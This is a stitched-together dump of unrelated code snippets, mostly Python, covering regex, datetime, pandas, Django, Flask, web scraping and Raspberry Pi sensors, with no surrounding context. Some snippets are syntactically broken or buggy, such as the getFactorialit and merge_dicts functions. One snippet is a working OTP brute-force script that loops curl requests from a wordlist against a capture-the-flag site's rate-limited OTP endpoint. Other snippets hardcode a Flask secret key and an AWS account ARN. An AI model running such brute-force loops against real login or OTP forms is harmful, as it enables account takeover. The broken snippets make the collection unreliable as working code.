- The filename must start with an English letters or a number (a-zA-Z0-9).
- The filename can **only** contain English letters, numbers and symbols among these four: `-_()`.
- The filename must end with a proper file extension among `.jpg`, `.jpeg`, `.png` and `.gif`
"""


def is_filename_safe(filename):
    # you only need to change the regular expression (regex) below
    regex = '^[a-zA-Z0-9][a-zA-Z0-9_()-]*(\.jpg|\.jpeg|\.png|\.gif)$'

    return re.match(regex, filename) is not None


import re

email = 'bartoszjakubiak23@gmail.com'
expresion = '[a-z\.]+'


domain = re.findall(expresion ,email)

print(domain)



price = 'Price : $189.45454'
expresion = 'Price : \$([0-9]*\.[0-9]*)' # \ escape character , * any number of numbers


matches = re.search(expresion ,price)

print(matches.group(0)) # entire match
print(matches.group(1)) # first thing in brackets
"""
. - matches one character
* many characters
[abc] - range of characters
[abc]+ matches one or more of this set
[A-z]+ - upercase
[A-z\.]@[A-z\.]+  - email
[A-z\.]@[A-z]+\.(com|me) - email


"""

from datetime import datetime ,timezone,timedelta


print(datetime.now()) # not aware about time zones , local computer time

print(datetime.now(timezone.utc)) # UTC TIME  +00:00 meaning there is not offset


today =  datetime.now(timezone.utc)
tomorrow = today + timedelta(days=1)

print(tomorrow)

print(today.strftime('%d-%m-%Y %H:%M:%S'))

#user_date = input('Give time in YYYY-mm-dd format')
#user_date = datetime.strptime(user_date,'%Y-%m-%d')

#print(user_date)

print(today.timestamp()) # linux timestamp
import time,timeit


def power(limit):
    return [x**2 for x in range(limit)]




def measure_runtime(func):
    start = time.time()
    func()
    end = time.time()
    print(end - start) # number of seconds since 1970



measure_runtime(lambda :power(5000000)) # lamda function allows us to pass an argument


## another way


print(timeit.timeit('[x**2 for x in range(10)]')) # it runs it many times many times
print(timeit.timeit('list(map(lambda x: x**2,range(10)))'))
# Python code to implement Priority Queue using Linked List
# Node class 
class Node:
    def __init__(self, item, priority):
        self.item = item
        self.next = None
        self.priority = priority

class PriorityQueue:
    def __init__(self):
        self.front = self.rear = None

    # Returns a boolean value indicating whether the queue is empty
    def isEmpty(self):
        return self.front == None

    # Adds the given item to the queue by inserting it in the proper 
    # position based on the given priority. The new node is appended to 
    # the end of the linked list
    def enqueue(self, item, priority):
        newNode = Node(item, priority)
        if not self.rear:
            self.front = self.rear = newNode
            return
        if self.front.priority < newNode.priority:
            newNode.next = self.front
            self.front = newNode
            return
        previous = None
        current = self.front
        while(current and newNode.priority < current.priority):
            previous = current
            current = current.next

        if current:
            previous.next = newNode
            newNode.next = current
        else:
            self.rear.next = newNode
            self.rear = newNode

    # Removes and returns the next item from the queue, which is the 
    # item with the highest priority. If two or more items have the 
    # same priority, those items are removed in FIFO order. An item 
    # cannot be dequeued from an empty queue. 
    def dequeue(self):
        if self.isEmpty():
            print('Queue is empty')
            return
        temp = self.front
        self.front = self.front.next
        if self.front == None:
            self.rear = None
        return temp.item
# A simple implementation of Priority Queue 
# using Queue. 
class PriorityQueue(object): 
    def __init__(self): 
        self.queue = [] 
  
    def __str__(self): 
        return ' '.join([str(i) for i in self.queue]) 
  
    # for checking if the queue is empty 
    def isEmpty(self): 
        return len(self.queue) == 0
  
    # for inserting an element in the queue 
    def insert(self, data): 
        self.queue.append(data) 
  
    # for popping an element based on Priority 
    def delete(self): 
        try: 
            max = 0
            for i in range(len(self.queue)): 
                if self.queue[i] > self.queue[max]: 
                    max = i 
            item = self.queue[max] 
            del self.queue[max] 
            return item 
        except IndexError: 
            print() 
            exit() 
split_col = pyspark.sql.functions.split(df['my_str_col'], '-')
df = df.withColumn('NAME1', split_col.getItem(0))
df = df.withColumn('NAME2', split_col.getItem(1))
gdown https://drive.google.com/uc?id=
# Customize the plot
ax.grid(1, ls='--', color='#777777', alpha=0.5, lw=1)
ax.tick_params(labelsize=12, length=0)
ax.set_axis_bgcolor('w')
# add a legend
leg = plt.legend( ['text'], loc=1 )
fr = leg.get_frame()
fr.set_facecolor('w')
fr.set_alpha(.7)
plt.draw()
 
import pylab as plt
import numpy as np

plt.style.use('ggplot')

fig = plt.figure(1)
ax = plt.gca()

# make some testing data
x = np.linspace( 0, np.pi, 1000 )
test_f = lambda x: np.sin(x)*3 + np.cos(2*x)

# plot the test data
ax.plot( x, test_f(x) , lw = 2)

# set the axis labels
ax.set_xlabel(r'$x$', fontsize=14, labelpad=10)
ax.set_ylabel(r'$f(x)$', fontsize=14, labelpad=25, rotation=0)

# set axis limits
ax.set_xlim(0,np.pi)

plt.draw()
 
def invoke_lambda_calculate_accounts(client_id):
    lambda_client = boto3.client('lambda')
    payload = {
        'client_id': client_id
    }
    response = lambda_client.invoke(
        FunctionName='arn:aws:lambda:sa-east-1:622978847361:function:calculate-accounts',
        InvocationType='RequestResponse',
        Payload=json.dumps(payload)
    )
    return response
pip3 install --trusted-host pypi.org --trusted-host files.pythonhosted.org flask-wtf
pytest
pytest folder/path/
pytest --cov=app
py.test -k methodname -v
py.test file_name.py::test_name -v
# Import system modules
import os
import sys
import arcpy
# Set workspace
env.workspace = \\Client\H\Documents\RRC\Year_3\ARP\Data\soil_metadata_clip
# Set local variables
out_folder_path = "I:\ARW Data"
out_name = "soil_metadata_clip.gdb"
# Execute CreateFileGDB
arcpy.CreateFileGDB_management(out_folder_path, out_name)
import arcpy
from arcpy import env 
from arcpy.sa import * 
arcpy.env.workspace = r"I:\ARW_Data\Data\Raw_Data\Soil_Moisture\2011"
arcpy.env.overwriteOutput = True
arcpy.CheckOutExtension('Spatial')
mask = r"I:\ARW_Data\slc_90m_clip1"
arcpy.env.cellSize = r"I:\ARW_Data\slc_90m_clip2"
rasters = arcpy.ListRasters("*.tif", "TIF")
for raster in rasters:
 outraster = raster.replace('.tif','_clip.tif')
 arcpy.gp.ExtractByMask_sa(raster,mask,outraster)
df_mapping['_map'] = df_mapping['name']+df_mapping['address']
df_mapping.set_index('_map',inplace=True)

df_masked['_map'] = df_masked['name']+df_masked['address']
df_masked['company_name'] = df_masked['_map'].map(df_mapping['company_name'].to_dict())
def model(data, column_to_drop, type_of_model, n_neighbors=4):
    from sklearn.model_selection import train_test_split
    from sklearn.linear_model import LinearRegression
    from sklearn.metrics import r2_score
    from sklearn import linear_model
    X = data.drop([column_to_drop], axis=1) 
    y = data[column_to_drop]
    X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.3, random_state=100)
    if type_of_model == 'LinearRegressor':  
        lm = linear_model.LinearRegression()
        model = lm.fit(X_train,y_train)
        predictions  = lm.predict(X_test)
        print("The R2 of the linear model is: ",round(r2_score(y_test, predictions),3))
    if type_of_model == 'KNeighborsRegressor':
        from sklearn.neighbors import KNeighborsRegressor
        knn_model = KNeighborsRegressor(n_neighbors=n_neighbors) 
        knn_model.fit(X_train, y_train)
        knn_predictions = knn_model.predict(X_test)
        print("The R2 of the knn model is: ",round(r2_score(y_test, knn_predictions),3))  

model(data_copy, 'name_your_target_column', 'LinearRegressor')
model(data_copy, 'name_your_target_column', 'KNeighborsRegressor', n_neighbors=4)
data.isin([' ', '0', 0, '', np.nan]).sum()
for i in categoricals:
    print(i, categoricals[i].unique())

for i in categoricals:
    print(i, categoricals[i].isin(['', ' ', '0']).sum())

#check the null and 0 values per each categorical feature 
data_copy=data.copy()
data_copy.head()
import numpy as np
import seaborn as sns
import matplotlib.pyplot as plt

def bin_dist():
    test_list = [10, 100, 1000, 10000]
    for i in test_list:
        x = np.random.binomial(n=i, p=0.5, size=i)
        print('--',i,'--')
        sns.distplot(x)
        plt.show()
        
bin_dist()
data_copy["ts"] = data_copy["effective_to_date"].astype("int64")/1e9 
data_copy["ts"].iloc[1]
# the division exclude milliseconds bringing it down to seconds
In [1]: from datetime import datetime
In [2]: import dateutil.relativedelta
In [3]: today_date = datetime.now().date()
In [4]: today_date
Out[1]: datetime.date(2016, 7, 5)
In [5]: last_month = today_date - dateutil.relativedelta.relativedelta(months=1)
In [6]: last_mont_first_date = last_month.replace(day=1)
In [7]: last_mont_first_date
Out[2]: datetime.date(2016, 6, 1)
def delete_last_line():
    with open('test.txt', "r+", encoding="utf-8") as file:

        # Move the pointer (similar to a cursor in a text editor) to the end of the file
        file.seek(0, os.SEEK_END)

        # This code means the following code skips the very last character in the file -
        # i.e. in the case the last line is null we delete the last line
        # and the penultimate one
        pos = file.tell() - 1

        # Read each character in the file one at a time from the penultimate
        # character going backwards, searching for a newline character
        # If we find a new line, exit the search
        while pos > 0 and file.read(1) != "\n":
            pos -= 1
            file.seek(pos, os.SEEK_SET)

        # save value of last line
        value = file.readline()

        # So long as we're not at the start of the file, delete all the characters ahead
        # of this position
        if pos > 0:
            file.seek(pos, os.SEEK_SET)
            file.truncate()

        return value
import pandas as pd

sheets_dict = pd.read_excel('Book1.xlsx', sheetname=None)

full_table = pd.DataFrame()
for name, sheet in sheets_dict.items():
    sheet['sheet'] = name
    sheet = sheet.rename(columns=lambda x: x.split('\n')[-1])
    full_table = full_table.append(sheet)

full_table.reset_index(inplace=True, drop=True)

print full_table
df = pd.DataFrame(np.random.randint(32, 120, 100000).reshape(50000,2),columns=list('AB'))
df['A'] = df['A'].apply(chr)

%timeit dict(zip(df.A,df.B))
%timeit pd.Series(df.A.values,index=df.B).to_dict()
%timeit df.set_index('A').to_dict()['B']
pip install -Uqq fastbook

import fastbook
fastbook.setup_book()
from fastbook import *
from fastai.vision.widgets import *
from fastai.vision.all import *
path = untar_data(URLs.PASCAL_2007)
from time import gmtime, strftime

 strftime("%Y-%m-%d %H:%M:%S", gmtime())
'2009-01-05 22:14:39'

import os
import glob

# read the ds18b20 sensor 
os.system('modprobe w1-gpio')
os.system('modprobe w1-therm')
 
base_dir = '/sys/bus/w1/devices/'
device_folder = glob.glob(base_dir + '28*')[0]
device_file = device_folder + '/w1_slave'

def read_temp_raw():
    f = open(device_file, 'r')
    lines = f.readlines()
    f.close()
    return lines
 
def read_temp():
    lines = read_temp_raw()
    while lines[0].strip()[-3:] != 'YES':
        time.sleep(0.2)
        lines = read_temp_raw()
    equals_pos = lines[1].find('t=')
    if equals_pos != -1:
        temp_string = lines[1][equals_pos+2:]
        temp_c = float(temp_string) / 1000.0
        temp_f = temp_c * 9.0 / 5.0 + 32.0
        return temp_c, temp_f
 
from gpiozero import CPUTemperature

# get the temperature of the CPU of the Raspberry
def getRaspiCpuTemperature():
    tempFile = open("/sys/class/thermal/thermal_zone0/temp")
    cpu_temp = tempFile.read()
    tempFile.close()
    return (float(cpu_temp) / 1000)

# get the temperature of the CPU of the Raspberry
# with gpiozero
def getRaspiCpuTemperature02():
    gpiozero_cpu = CPUTemperature()
    return (gpiozero_cpu.temperature)
import socket

# get the current IP adress
def get_ip_adress():
   ip_address = '';
   s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
   s.connect(("8.8.8.8",80))
   ip_address = s.getsockname()[0]
   s.close()
   return (ip_address)           
from bs4 import BeautifulSoup, Tag
import re

data = '''<div>
<a href="link_1">Link 1</a>
<a href="link_2">Link 1</a>
<a href="link_XXX">Link 1</a>
<a href="link_3">Link 1</a>
</div>'''

soup = BeautifulSoup(data, 'lxml')

class my_regex_searcher:
    def __init__(self, regex_string):
        self.__r = re.compile(regex_string)
        self.groups = []

    def __call__(self, what):
        if isinstance(what, Tag):
            what = what.name

        if what:
            g = self.__r.findall(what)
            if g:
                self.groups.append(g)
                return True
        return False

    def __iter__(self):
        yield from self.groups

searcher = my_regex_searcher(r'link_(\d+)')
for l, groups in zip(soup.find_all(href=searcher), searcher):
    print(l)
    print(groups)

searcher = my_regex_searcher(r'(d)(i)(v)')
for l, groups in zip(soup.find_all(searcher), searcher):
    print(l.prettify())
    print(groups)
listOfSeries = []

for df in dfs:
	listOfSeries.append(df[df.columns[0]])

# df.iloc[:, 0]
# df[df.columns[0]]

newDF = pd.concat(listOfSeries, axis=1)
//template

{% for contact in page_obj %}
    {# Each "contact" is a Contact model object. #}
    {{ contact.full_name|upper }}<br>
    ...
{% endfor %}

<div class="pagination">
    <span class="step-links">
        {% if page_obj.has_previous %}
            <a href="?page=1">&laquo; first</a>
            <a href="?page={{ page_obj.previous_page_number }}">previous</a>
        {% endif %}

        <span class="current">
            Page {{ page_obj.number }} of {{ page_obj.paginator.num_pages }}.
        </span>

        {% if page_obj.has_next %}
            <a href="?page={{ page_obj.next_page_number }}">next</a>
            <a href="?page={{ page_obj.paginator.num_pages }}">last &raquo;</a>
        {% endif %}
    </span>
</div>
         

//views.py
         
from django.core.paginator import Paginator
from django.shortcuts import render

from myapp.models import Contact

def listing(request):
    contact_list = Contact.objects.all()
    paginator = Paginator(contact_list, 25) # Show 25 contacts per page.

    page_number = request.GET.get('page')
    page_obj = paginator.get_page(page_number)
    return render(request, 'list.html', {'page_obj': page_obj})       
{% if request.resolver_match.url_name == 'home' %} active {% endif %}
Path(BASE_DIR, 'templates')
admin.site.site_header = 'WISEMAN'
    def __str__(self):
        return self.title
//inside the class on the model

class Meta: 
        verbose_name = "Movie"
        verbose_name_plural = "Movies"
//settings.py

STATICFILES_DIRS = [
    BASE_DIR, "static",
]

//urls.py

from django.conf import settings
from django.conf.urls.static import static

 + static(settings.STATIC_URL, document_root=settings.STATIC_ROOT)
//settings.py

MEDIA_ROOT = Path(BASE_DIR, 'media/')

//main urls.py

from django.conf import settings
from django.conf.urls.static import static

urlpatterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)
# me - this DAT
# scriptOp - the OP which is cooking

# press 'Setup Parameters' in the OP to call this function to re-create the parameters.
def onSetupParameters(scriptOp):
	page = scriptOp.appendCustomPage('Parameters')
	p = page.appendInt('Par1', label='ParA')
	p = page.appendFloat('Par2', label='ParB')
	return
		
# called whenever custom pulse parameter is pushed
def onPulse(par):
	return

def onCook(scriptOp):
	scriptOp.clear()
	
	#Declare Variables
	samples = scriptOp.par.Samples

	# Assign Samples to CHOP
	scriptOp.numSamples = samples

	#Calculate Step Size

	# Append output channels
	tx = scriptOp.appendChan('tx')
	ty = scriptOp.appendChan('ty')
	tz = scriptOp.appendChan('tz')

	#Assign Value to channels Implementing the Parametric Equation
	return
import os
def split(word): 
    return [char for char in word] 
f1=open('wordlist.txt','r')
invalid_response=os.popen('curl -H "User-Agent: th3pr0xyb0y/1337" "http://ratelimit.noobarmy.org/Enterotp" -H "Content-Type: application/x-www-form-urlencoded" -d "digit_1=1&digit_2=2&digit_3=3&digit_4=4" --silent').read()
numbers=f1.read().splitlines()
for i in numbers:
    temp=split(i)
    smallpayload="digit_1="+temp[0]+"&digit_2="+temp[1]+"&digit_3="+temp[2]+"&digit_4="+temp[3]
    payload= 'curl -H "User-Agent: th3pr0xyb0y/1337" "http://ratelimit.noobarmy.org/Enterotp" -H "Content-Type: application/x-www-form-urlencoded" -d "'+smallpayload+'" --silent '
    print("Testing OTP",temp[0],temp[1],temp[2],temp[3])
    # print(payload)
    response=os.popen(payload).read()
    if(response!=invalid_response):
        print("Correct OTP IS ",temp[0],temp[1],temp[2],temp[3])
        print("Flag Is : ",response)
        exit(0)

def combinations(n, k):
    '''
    Returns the number of ways you can choose k items out of n if order does not matter

    Parameters:
    ----------
    n: (int)
    k: (int)

    Returns:
    ----------
    Returns the number of combinations of k items out of n.
    '''
    import math
    combs = math.factorial(n)/(math.factorial(k)*math.factorial(n-k))
    return combs

def poisson_pmf(lmbda, k) : 
    return (lmbda**k * e**(-lmbda)) / factorial(k) 
print(poisson_pmf(3, 2)) #0.22404180765538778
import json

with open('data.txt') as json_file:
    data = json.load(json_file)
    for p in data['people']:
        print('Name: ' + p['name'])
        print('Website: ' + p['website'])
        print('From: ' + p['from'])
        print('')
import json

data = {}
data['people'] = []
data['people'].append({
    'name': 'Scott',
    'website': 'stackabuse.com',
    'from': 'Nebraska'
})
data['people'].append({
    'name': 'Larry',
    'website': 'google.com',
    'from': 'Michigan'
})

with open('data.txt', 'w') as outfile:
    json.dump(data, outfile)
def get_stats(account_email, account_password):
	print("Getting stats for account %s" % account_email)
	chrome_options = Options() 
	# chrome_options.add_argument("--headless")
	path_to_driver = os.path.join(
		os.path.dirname(os.path.dirname(os.getcwd())), "chromedriver.exe")
	driver = webdriver.Chrome(ChromeDriverManager().install(), options=chrome_options)
	# login
	driver.get("https://www.tumblr.com/login")
	driver.set_window_size(1294, 1400)
	driver.find_element(By.ID, "signup_determine_email").send_keys("youremailaddress")
	driver.find_element(By.ID, "signup_determine_email").send_keys(Keys.ENTER)
	time.sleep(1)
	driver.find_element(By.LINK_TEXT, "Use password to log in").click()
	time.sleep(1)
	driver.find_element(By.ID, "signup_password").send_keys("yourpassword")
	driver.find_element(By.ID, "signup_password").send_keys(Keys.ENTER)
import gspread
from oauth2client.service_account import ServiceAccountCredentials
from datetime import date

def upload_stat_data_to_google_sheets(email, posts_in_queue, followers):
	scope = ["https://spreadsheets.google.com/feeds", 'https://www.googleapis.com/auth/spreadsheets',
		"https://www.googleapis.com/auth/drive.file", "https://www.googleapis.com/auth/drive"]

	creds = ServiceAccountCredentials.from_json_keyfile_name(
		os.path.join(os.getcwd(), 'stat_scraper',"google_cloud_credentials.json"), scope)

	client = gspread.authorize(creds)

	sheet = client.open("automation_stats").sheet1
	analytics = client.open("automation_stats").worksheet("analytics")
	data = sheet.get_all_records()
	current_date = date.today().strftime('%d.%m.%y')
	row_to_insert = [[current_date, email, posts_in_queue, followers]]	
	sheet.append_rows(row_to_insert)
logging.basicConfig(
  level="INFO",
  format="%(asctime)s   (%(filename)s:%(lineno)s) %(levelname)s - %(message)s",
  datefmt="%Y-%m-%d - %H:%M:%S"
)
time = "01:34:11"
sum(x * int(t) for x, t in zip([3600, 60, 1], time.split(":"))) 
return sorted(list_of_dicts, key=lambda e: e['dict_key'], reverse=True)
In [2]: read_csv('sample.csv', dtype={'ID': object})
Out[2]: 
                           ID
0  00013007854817840016671868
1  00013007854817840016749251
2  00013007854817840016754630
3  00013007854817840016781876
4  00013007854817840017028824
5  00013007854817840017963235
6  00013007854817840018860166
1
2
3
4
5
6
a = [[1, 2, 3, 4], [5, 6], [7, 8, 9]]
for i in range(len(a)):
    for j in range(len(a[i])):
        print(a[i][j], end=' ')
    print()
pip list --outdated --format=freeze | grep -v '^\-e' | cut -d = -f 1  | xargs -n1 pip install -U
# open a json file for reading and print content using json.load
with open("/xyz/json_data.json", "r") as content:
  print(json.load(content))

# If we want to use json.loads():

with open("json_data.json", "r") as content:
  print(json.loads(content.read()))
def factorial(n):
  if n == 0:
    return 1
  else:
    return n * factorial(n - 1)
print(factorial(5))
#This is a code comment and anything we put after the # will not run
#print(5) should return 5 but because it is in a comment it wont show up
# Python program to illustrate 
# not 'in' operator 
x = 24
y = 20
list = [10, 20, 30, 40, 50 ]; 

if ( x not in list ): 
	print("x is NOT present in given list") 
else: 
	print("x is present in given list") 

if ( y in list ): 
	print("y is present in given list") 
else: 
	print("y is NOT present in given list") 

# Python program to illustrate 
# Finding common member in list  
# using 'in' operator 
list1=[1,2,3,4,5] 
list2=[6,7,8,9] 
for item in list1: 
    if item in list2: 
        print("overlapping")       
else: 
    print("not overlapping") 
>>> [a+b for a,b in re.findall('id_([a-z]+)|num([0-9]+)', s)]
['john', '847']
import glob
import os

list_of_files = glob.glob('/path/to/folder/*') # * means all if need specific format then *.csv
latest_file = max(list_of_files, key=os.path.getctime)
print latest_file
(df.groupby('name')['ext price']
 .agg(['mean', 'sum'])
 .style.format('${0:,.2f}'))
'${:,.2f}'.format(dfCombined['Amount'].sum())
In [8]: from bs4 import BeautifulSoup

In [9]: from selenium import webdriver

In [10]: driver = webdriver.Firefox()

In [11]: driver.get('http://news.ycombinator.com')

In [12]: html = driver.page_source

In [13]: soup = BeautifulSoup(html)

In [14]: for tag in soup.find_all('title'):
   ....:     print tag.text
   ....:     
   ....:     
Hacker News
import bs4

html = """<div class="someClass">
    <a href="href">
        <img alt="some" src="some"/>
    </a>
</div>"""

soup = bs4.BeautifulSoup(html, "html.parser")

# this will return src attrib from img tag that is inside 'a' tag
soup.a.img['src']

>>> 'some'

# if you have more then one 'a' tag
for a in soup.find_all('a'):
    if a.img:
        print(a.img['src'])

>>> 'some'
my_dict = {"color": "red", "width": 17, "height": 19}
value_to_find = "red"

# Brute force solution (fastest) -- single key
for key, value in my_dict.items():
    if value == value_to_find:
        print(f'{key}: {value}')
        break

# Brute force solution -- multiple keys
for key, value in my_dict.items():
    if value == value_to_find:
        print(f'{key}: {value}')

# Generator expression -- single key
key = next(key for key, value in my_dict.items() if value == value_to_find)
print(f'{key}: {value_to_find}')

# Generator expression -- multiple keys
exp = (key for key, value in my_dict.items() if value == value_to_find)
for key in exp:
    print(f'{key}: {value}')

# Inverse dictionary solution -- single key
my_inverted_dict = {value: key for key, value in my_dict.items()}
print(f'{my_inverted_dict[value_to_find]}: {value_to_find}')

# Inverse dictionary solution (slowest) -- multiple keys
my_inverted_dict = dict()
for key, value in my_dict.items():
    my_inverted_dict.setdefault(value, list()).append(key)
print(f'{my_inverted_dict[value_to_find]}: {value_to_find}')
my_dict = {
  'Izuku Midoriya': 'One for All', 
  'Katsuki Bakugo': 'Explosion', 
  'All Might': 'One for All', 
  'Ochaco Uraraka': 'Zero Gravity'
}

# Use to invert dictionaries that have unique values
my_inverted_dict = dict(map(reversed, my_dict.items()))

# Use to invert dictionaries that have unique values
my_inverted_dict = {value: key for key, value in my_dict.items()}

# Use to invert dictionaries that have non-unique values
from collections import defaultdict
my_inverted_dict = defaultdict(list)
{my_inverted_dict[v].append(k) for k, v in my_dict.items()}

# Use to invert dictionaries that have non-unique values
my_inverted_dict = dict()
for key, value in my_dict.items():
    my_inverted_dict.setdefault(value, list()).append(key)

# Use to invert dictionaries that have lists of values
my_dict = {value: key for key in my_inverted_dict for value in my_inverted_dict[key]}
yusuke_power = {"Yusuke Urameshi": "Spirit Gun"}
hiei_power = {"Hiei": "Jagan Eye"}
powers = dict()

# Brute force
for dictionary in (yusuke_power, hiei_power):
    for key, value in dictionary.items():
        powers[key] = value

# Dictionary Comprehension
powers = {key: value for d in (yusuke_power, hiei_power) for key, value in d.items()}

# Copy and update
powers = yusuke_power.copy()
powers.update(hiei_power)

# Dictionary unpacking (Python 3.5+)
powers = {**yusuke_power, **hiei_power}

# Backwards compatible function for any number of dicts
def merge_dicts(*dicts: dict):
    merged_dict = dict()
    for dictionary in dicts:
        merge_dict.update(dictionary)
    return merged_dict

# Dictionary union operator (Python 3.9+ maybe?)
powers = yusuke_power | hiei_power
virtualenv env

# linux
source env/bin/activate

#windows
env\Scripts\activate.bat

deactivate
from flask import Flask,render_template,request, redirect
 
 
app = Flask(__name__)
app.config['SECRET_KEY'] = 'dajdsjas'
 
 
@app.route('/home')
def home():
    return 'Home page'
 
 
 
@app.route('/take_parameter', methods = ["POST"])
def takeparam():
    try:
        pas = request.args(silent=True)
        #app.logger.info(json)
        return 'OK'
    except:
        return 'INTERNAL ERROR', 500
    
 
@app.route('/take_json', methods = ["POST"])
def takejson():
    try:
        pas = request.get_json(silent=True)
        #app.logger.info(json)
        return 'OK'
    except:
        return 'INTERNAL ERROR', 500
    
if __name__ =='__main__':
    app.run(debug=True)
 
# Works with matplotlib and seaborn

%config InlineBackend.figure_format ='retina'
from IPython.core.interactiveshell import InteractiveShell
InteractiveShell.ast_node_interactivity = "all"
from itertools import zip_longest
l1=[1,2,3,4,5,6,7]
l2=['a','b','c','d']
d1=zip_longest(l1,l2,fillvalue='x')
print (d1)#Output:<itertools.zip_longest object at 0x00993C08>
#Converting zip object to dict using dict() contructor.
print (dict(d1))
#Output:{1: 'a', 2: 'b', 3: 'c', 4: 'd', 5: 'x', 6: 'x', 7: 'x'}
from time import strptime
month_name = 'Jan'
month_number = strptime(month_name, '%b').tm_mon
month_number

'''
%a  Locale’s abbreviated weekday name.    
%A  Locale’s full weekday name.    
%b  Locale’s abbreviated month name.  
%B  Locale’s full month name.      
%c  Locale’s appropriate date and time representation.    
%d  Day of the month as a decimal number [01,31].    
%f  Microsecond as a decimal number [0,999999], zero-padded on the left     (1)
%H  Hour (24-hour clock) as a decimal number [00,23].    
%I  Hour (12-hour clock) as a decimal number [01,12].    
%j  Day of the year as a decimal number [001,366].  
%m  Month as a decimal number [01,12].  
%M  Minute as a decimal number [00,59].      
%p  Locale’s equivalent of either AM or PM.   (2)
%S  Second as a decimal number [00,61].     (3)
%U  Week number of the year (Sunday as the first day of the week) as a decimal number [00,53]. All days in a new year preceding the first Sunday are considered to be in week 0.    (4)
%w  Weekday as a decimal number [0(Sunday),6].  
%W  Week number of the year (Monday as the first day of the week) as a decimal number [00,53]. All days in a new year preceding the first Monday are considered to be in week 0.    (4)
%x  Locale’s appropriate date representation.      
%X  Locale’s appropriate time representation.      
%y  Year without century as a decimal number [00,99].    
%Y  Year with century as a decimal number.  
%z  UTC offset in the form +HHMM or -HHMM (empty string if the the object is naive).    (5)
%Z  Time zone name (empty string if the object is naive).    
%%  A literal '%' character.
'''
>>> mydict = {'one': [1,2,3], 2: [4,5,6,7], 3: 8}

>>> dict_df = pd.DataFrame({ key:pd.Series(value) for key, value in mydict.items() })

>>> dict_df

   one  2    3
0  1.0  4  8.0
1  2.0  5  NaN
2  3.0  6  NaN
3  NaN  7  NaN
import re 
s = "string. With. Punctuation?" 
s = re.sub(r'[^\w\s]','',s) 
import os  
path="abc.txt"  
if os.path.isdir(path):  
    print("\nIt is a directory")  
elif os.path.isfile(path):  
    print("\nIt is a normal file")  
else:  
    print("It is a special file (socket, FIFO, device file)" )
print()


df['column_name'] = pd.to_datetime(df['column_name'])
# new version
df.groupby(pd.Grouper(key='column_name', freq="M")).mean().plot()
start_time = time.clock()
result = 0
for row in df.itertuples(index=False):
    result += max(row[df.columns.get_loc('B')], row[df.columns.get_loc('C')])

total_elapsed_time = round(time.clock() - start_time, 2)
print("4. Polyvalent Itertuples working even with special characters in the column name done in {} seconds, result = {}".format(total_elapsed_time, result))
import pkg_resources, string
from symspellpy import SymSpell, Verbosity

spell = SymSpell(max_dictionary_edit_distance=2, prefix_length=7)
dictionary_path = pkg_resources.resource_filename('symspellpy', 'frequency_dictionary_en_82_765.txt')
spell.load_dictionary(dictionary_path, term_index=0, count_index=1)

def correct(w):
  word = w
  o = spell.lookup(w,
    Verbosity.CLOSEST,
    max_edit_distance=2,
    transfer_casing=True)
  if not o: return w
  word = o[0].term
  if w[0].isupper():
    word = word[0].upper() + ''.join(word[1:])
  # find start punctuation
  start_idx = 0
  start_punct = ''
  while w[start_idx] in string.punctuation:
    start_punct += w[start_idx]
    if start_idx + 1 < len(w):
      start_idx += 1
    else:
      break
  # find end punctuation
  end_idx = 1
  end_punct = ''
  while w[-end_idx] in string.punctuation:
    end_punct += w[-end_idx]
    if end_idx - 1 > 0:
      end_idx -= 1
    else:
      break
  return start_punct + word + end_punct

s = '''Now that we have carried our geographical analogy quite far, we return to the uestion of isomorphisms between brains. You might well wonder why this whole uestion of brain isomorphisms has been stressed so much. What does it matter if two rains are isomorphic, or quasi-isomorphic, or not isomorphic at all? The answer is that e have an intuitive sense that, although other people differ from us in important ways, hey are still "the same" as we are in some deep and important ways. It would be nstructive to be able to pinpoint what this invariant core of human intelligence is, and hen to be able to describe the kinds of "embellishments" which can be added to it, aking each one of us a unique embodiment of this abstract and mysterious quality alled "intelligence".'''
cleaned = ' '.join([correct(w) for w in s.split()])
print(cleaned)
phrase = input("Choose your phrase:")
def translate(phrase):
    for letter in phrase:
        if letter in "C":
            letter = phrase.replace("C","b")
        if letter in "c":
            letter = phrase.replace("c","b")
        else:
            letter = phrase
        return letter
print(translate(phrase))
def getFactorialit (n):
	if n < 0, return -1
    else fact = 1
    for i in range (1, n +1):
    	fact *=i
    return fact
    
print getFactorialit(10)
    
desired_tab = driver.current_window_handle  #storing the handle in a variable
if driver.current_window_handle != desired_tab:
   driver.switch_to_window(desired_tab)  #switching to the tab in case it's not
my_classifiers = {'logit': '<trained_logit_here>',
                  'KNN' : '<trained_KNN_here>'
                  }
pickle._dump(my_classifiers, open(filename, 'wb'))

loaded_classifiers = pickle.load(open(filename, 'rb'))
logit_model = loaded_classifiers['logit']
knn_model = loaded_classifiers['KNN']

results = logit_model.predict(X)
x = tf.placeholder(tf.int16, shape=(), name='ha')
y = tf.placeholder(tf.int16, shape=(), name='ho')

add = tf.add(x, y)
mul = tf.multiply(x, y)
# creates a list of numbers

numbers = ['1','2','3','4','5','6','7','8','9','0'] 

# a function that removes the string characters such as "$" or "," by using the list created above

def convertToInt(column):
    return int(''.join(filter(lambda x: x in numbers, column)))
import datetime
import dateutil.relativedelta

d = datetime.datetime.strptime("2013-03-31", "%Y-%m-%d")
d2 = d - dateutil.relativedelta.relativedelta(months=1)
print d2
from pyspark.sql import SparkSession
spark = SparkSession.builder.appName('abc').getOrCreate()
import datetime

def last_day_of_month(any_day):
    next_month = any_day.replace(day=28) + datetime.timedelta(days=4)  # this will never fail
    return next_month - datetime.timedelta(days=next_month.day)
from datetime import datetime, timedelta

d = datetime.today() - timedelta(days=days_to_subtract)
>>> from enum import Enum
>>> class Build(Enum):
...   debug = 200
...   build = 400
... 

Build['debug']

df.set_index(KEY).to_dict()[VALUE]

3 ways:
dict(zip(df.A,df.B))
pd.Series(df.A.values,index=df.B).to_dict()
df.set_index('A').to_dict()['B']
def isfloat(value):
  try:
    float(value)
    return True
  except ValueError:
    return False
f = open('test.json')
json_file = json.load(f)
import pandas as pd

data_dict = {'one': pd.Series([1, 2, 3], index=['a', 'b', 'c']),
             'two': pd.Series([1, 2, 3, 4], index=['a', 'b', 'c', 'd'])}

df = pd.DataFrame(data_dict)

print(f"DataFrame:\n{df}\n")
print(f"column types:\n{df.dtypes}")

col_one_list = df['one'].tolist()

col_one_arr = df['one'].to_numpy()

print(f"\ncol_one_list:\n{col_one_list}\ntype:{type(col_one_list)}")
